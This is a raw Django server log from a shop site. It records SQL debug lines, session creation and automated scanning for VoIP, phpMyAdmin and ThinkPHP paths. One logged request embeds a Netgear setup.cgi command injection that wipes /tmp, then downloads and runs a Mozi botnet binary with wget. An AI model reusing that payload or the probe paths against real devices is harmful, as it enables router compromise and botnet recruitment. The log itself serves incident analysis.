HTTP/1.0" 404 1742 DEBUG 2019-12-15 00:09:15,424 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'pbx'; args=('pbx',) Not Found: /pbx/ [15/Dec/2019 00:09:15] "GET /pbx/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:18,049 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cisco'; args=('cisco',) Not Found: /cisco/ [15/Dec/2019 00:09:18] "GET /cisco/ HTTP/1.0" 404 1726 DEBUG 2019-12-15 00:09:18,862 utils 20136 140506411554560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'linksys'; args=('linksys',) Not Found: /linksys/ [15/Dec/2019 00:09:18] "GET /linksys/ HTTP/1.0" 404 1730 DEBUG 2019-12-15 00:09:22,277 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'sip'; args=('sip',) Not Found: /sip/ [15/Dec/2019 00:09:22] "GET /sip/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:23,852 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'xml'; args=('xml',) Not Found: /xml/ [15/Dec/2019 00:09:23] "GET /xml/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:26,534 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'aastra'; args=('aastra',) Not Found: /aastra/ [15/Dec/2019 00:09:26] "GET /aastra/ HTTP/1.0" 404 1728 DEBUG 2019-12-15 00:09:27,695 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'config'; args=('config',) Not Found: /config/ [15/Dec/2019 00:09:27] "GET /config/ HTTP/1.0" 404 1728 DEBUG 2019-12-15 00:09:30,887 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phone'; args=('phone',) Not Found: /phone/ [15/Dec/2019 00:09:30] "GET /phone/ HTTP/1.0" 404 1726 DEBUG 2019-12-15 00:09:33,375 utils 20136 140506411554560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phones'; args=('phones',) Not Found: /phones/ [15/Dec/2019 00:09:33] "GET /phones/ HTTP/1.0" 404 1728 DEBUG 2019-12-15 00:09:35,987 utils 20136 140506411554560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cnf'; args=('cnf',) Not Found: /cnf/ [15/Dec/2019 00:09:35] "GET /cnf/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:38,998 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'configs'; args=('configs',) Not Found: /configs/ [15/Dec/2019 00:09:39] "GET /configs/ HTTP/1.0" 404 1730 Not Found: /ip phone/ [15/Dec/2019 00:09:42] "GET /ip%20phone/ HTTP/1.0" 404 6622 DEBUG 2019-12-15 00:09:55,368 utils 20136 140506411554560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = '3CX'; args=('3CX',) Not Found: /3CX/ [15/Dec/2019 00:09:55] "GET /3CX/ HTTP/1.0" 404 1722 DEBUG 2019-12-15 00:09:58,167 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'voip'; args=('voip',) Not Found: /voip/ [15/Dec/2019 00:09:58] "GET /voip/ HTTP/1.0" 404 1724 DEBUG 2019-12-15 00:10:01,404 utils 20136 140506411554560 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'medIat'; args=('medIat',) Not Found: /medIat/ [15/Dec/2019 00:10:01] "GET /medIat/ HTTP/1.0" 404 1728 DEBUG 2019-12-15 00:10:03,668 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Nextiva'; args=('Nextiva',) Not Found: /Nextiva/ [15/Dec/2019 00:10:03] "GET /Nextiva/ HTTP/1.0" 404 1730 [15/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 00:10:06,683 utils 20136 140506411554560 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'ComVoice'; args=('ComVoice',) Not Found: /ComVoice/ [15/Dec/2019 00:10:06] "GET /ComVoice/ HTTP/1.0" 404 1732 DEBUG 2019-12-15 00:10:09,168 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Phoenix'; args=('Phoenix',) Not Found: /Phoenix/ [15/Dec/2019 00:10:09] "GET /Phoenix/ HTTP/1.0" 404 1730 [15/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 00:17:55,744 utils 20136 140506411554560 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cpkoj02o6jrp4bxuvol0thc2gveuhhzu' LIMIT 1; args=('cpkoj02o6jrp4bxuvol0thc2gveuhhzu',) DEBUG 2019-12-15 00:17:55,747 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cpkoj02o6jrp4bxuvol0thc2gveuhhzu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T00:17:55.745600+00:00'::timestamptz); args=('cpkoj02o6jrp4bxuvol0thc2gveuhhzu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 0, 17, 55, 745600, tzinfo=)) [15/Dec/2019 00:17:55] "GET /login/?next=/%3FC%3DN%3BO%3DD HTTP/1.0" 200 1810 [15/Dec/2019 00:22:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:27:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:35:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:40:44] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:47:46] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:52:48] "GET / HTTP/1.0" 302 0 [15/Dec/2019 00:57:51] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:14:37] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:15:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /robots.txt [15/Dec/2019 01:20:58] "GET /robots.txt HTTP/1.0" 404 6623 [15/Dec/2019 01:20:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 01:20:59,396 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hp5xvlhb9mowetrwz2mf4mcwisg8rd1i' LIMIT 1; args=('hp5xvlhb9mowetrwz2mf4mcwisg8rd1i',) DEBUG 2019-12-15 01:20:59,397 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hp5xvlhb9mowetrwz2mf4mcwisg8rd1i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T01:20:59.396515+00:00'::timestamptz); args=('hp5xvlhb9mowetrwz2mf4mcwisg8rd1i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 1, 20, 59, 396515, tzinfo=)) [15/Dec/2019 01:20:59] "GET /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 01:21:35] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:26:38] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:33:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:39:36] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:44:38] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:49:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:52:56] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:54:15] "GET / HTTP/1.0" 302 0 [15/Dec/2019 01:54:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:00:02] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 02:05:04] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:10:07] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:15:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:20:12] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:25:15] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:37:15] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:45:25] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:50:28] "GET / HTTP/1.0" 302 0 [15/Dec/2019 02:55:56] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:25:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:30:40] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:35:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:40:46] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:45:49] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:51:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:54:28] "GET / HTTP/1.0" 302 0 [15/Dec/2019 03:56:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:10:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:15:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:21:38] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:23:10] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:26:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 04:35:42] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:38:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:40:44] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:45:47] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:50:50] "GET / HTTP/1.0" 302 0 [15/Dec/2019 04:55:52] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:05:02] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:15:07] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:20:10] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:25:44] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:35:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:41:07] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:46:36] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:46:36] "GET / HTTP/1.0" 302 0 Not Found: /phpmyadmin/index.php [15/Dec/2019 05:47:50] "HEAD /phpmyadmin/index.php HTTP/1.0" 404 6654 [15/Dec/2019 05:49:20] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:54:23] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:56:27] "GET / HTTP/1.0" 302 0 [15/Dec/2019 05:59:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:15:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:27:12] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:27:37] "HEAD / HTTP/1.0" 302 0 [15/Dec/2019 06:27:37] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-15 06:27:37,905 utils 20136 140506411554560 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dtm26iwhh28x107c1bdgik5awm2vuzzg' LIMIT 1; args=('dtm26iwhh28x107c1bdgik5awm2vuzzg',) DEBUG 2019-12-15 06:27:37,907 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dtm26iwhh28x107c1bdgik5awm2vuzzg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T06:27:37.905728+00:00'::timestamptz); args=('dtm26iwhh28x107c1bdgik5awm2vuzzg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 6, 27, 37, 905728, tzinfo=)) [15/Dec/2019 06:27:37] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 06:35:42] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:44:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:51:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 06:59:25] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:05:21] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:10:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:17:01] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:23:28] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [15/Dec/2019 07:25:07] "GET /proxy.php HTTP/1.0" 404 6627 [15/Dec/2019 07:28:31] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:35:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:40:44] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:45:58] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:53:23] "GET / HTTP/1.0" 302 0 [15/Dec/2019 07:58:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:10:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:17:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:25:13] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:30:16] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:35:42] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:40:44] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [15/Dec/2019 08:43:50] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [15/Dec/2019 08:43:52] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [15/Dec/2019 08:43:52] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [15/Dec/2019 08:43:53] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [15/Dec/2019 08:43:54] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [15/Dec/2019 08:43:55] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [15/Dec/2019 08:43:56] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [15/Dec/2019 08:43:56] "GET /index.php HTTP/1.0" 404 6620 [15/Dec/2019 08:43:57] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 08:43:57,591 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'stidgaq39i5cwnpoxwzgzo95kfe6kt0r' LIMIT 1; args=('stidgaq39i5cwnpoxwzgzo95kfe6kt0r',) DEBUG 2019-12-15 08:43:57,593 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('stidgaq39i5cwnpoxwzgzo95kfe6kt0r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T08:43:57.591903+00:00'::timestamptz); args=('stidgaq39i5cwnpoxwzgzo95kfe6kt0r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 8, 43, 57, 591903, tzinfo=)) [15/Dec/2019 08:43:57] "GET /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 08:45:47] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:48:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:50:50] "GET / HTTP/1.0" 302 0 [15/Dec/2019 08:58:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [15/Dec/2019 09:09:26] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /error.log [15/Dec/2019 09:09:27] "GET /error.log HTTP/1.0" 404 6621 [15/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:22:09] "GET / HTTP/1.0" 302 0 Not Found: /admin.resfx.com/ [15/Dec/2019 09:24:06] "GET /admin.resfx.com/ HTTP/1.0" 404 6642 [15/Dec/2019 09:27:24] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [15/Dec/2019 09:27:59] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [15/Dec/2019 09:28:03] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=115 HTTP/1.0" 404 6705 Not Found: /newslist.asp [15/Dec/2019 09:28:06] "GET /newslist.asp?type=4&id=1282 HTTP/1.0" 404 6649 [15/Dec/2019 09:32:46] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:37:48] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:42:51] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:48:55] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:53:57] "GET / HTTP/1.0" 302 0 [15/Dec/2019 09:59:00] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:20:57] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:26:00] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:31:02] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:36:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:41:10] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:46:12] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:48:52] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:51:15] "GET / HTTP/1.0" 302 0 [15/Dec/2019 10:53:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 10:53:38,912 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vgn7urbnfg94bt6qhxsntmhk3s9v2bph' LIMIT 1; args=('vgn7urbnfg94bt6qhxsntmhk3s9v2bph',) DEBUG 2019-12-15 10:53:38,914 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vgn7urbnfg94bt6qhxsntmhk3s9v2bph', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T10:53:38.912590+00:00'::timestamptz); args=('vgn7urbnfg94bt6qhxsntmhk3s9v2bph', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 10, 53, 38, 912590, tzinfo=)) [15/Dec/2019 10:53:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 10:53:49] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [15/Dec/2019 10:53:50] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [15/Dec/2019 10:53:50] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [15/Dec/2019 10:53:50] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [15/Dec/2019 10:59:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:25:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:30:16] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:35:19] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:40:21] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:45:24] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:50:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 11:55:29] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:10:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:20:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 12:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:25:13] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:30:16] "GET / HTTP/1.0" 302 0 Not Found: /setup.cgi [15/Dec/2019 12:33:28] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 6785 [15/Dec/2019 12:35:39] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:39:51] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:40:42] "GET / HTTP/1.0" 302 0 Not Found: /clientaccesspolicy.xml [15/Dec/2019 12:42:21] "GET /clientaccesspolicy.xml HTTP/1.0" 404 6659 [15/Dec/2019 12:45:45] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:50:19] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:52:16] "GET / HTTP/1.0" 302 0 [15/Dec/2019 12:57:59] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:02:59] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:10:04] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:15:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [15/Dec/2019 13:18:51] "GET /robots.txt HTTP/1.0" 404 6624 [15/Dec/2019 13:18:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 13:18:59,589 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dez75arnk03dz0d2rfgun9t1v7edm3al' LIMIT 1; args=('dez75arnk03dz0d2rfgun9t1v7edm3al',) DEBUG 2019-12-15 13:18:59,591 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dez75arnk03dz0d2rfgun9t1v7edm3al', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T13:18:59.589913+00:00'::timestamptz); args=('dez75arnk03dz0d2rfgun9t1v7edm3al', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 13, 18, 59, 589913, tzinfo=)) [15/Dec/2019 13:18:59] "GET /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 13:20:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:28:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:37:31] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:46:29] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:51:32] "GET / HTTP/1.0" 302 0 [15/Dec/2019 13:51:41] "GET / HTTP/1.0" 302 0 Not Found: /w00tw00t.at.blackhats.romanian.anti-sec:) [15/Dec/2019 13:52:35] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.0" 404 6716 Not Found: /phpmyadmin/scripts/setup.php [15/Dec/2019 13:52:35] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /pma/scripts/setup.php [15/Dec/2019 13:52:36] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [15/Dec/2019 13:52:36] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 [15/Dec/2019 13:56:43] "GET / HTTP/1.0" 302 0 DEBUG 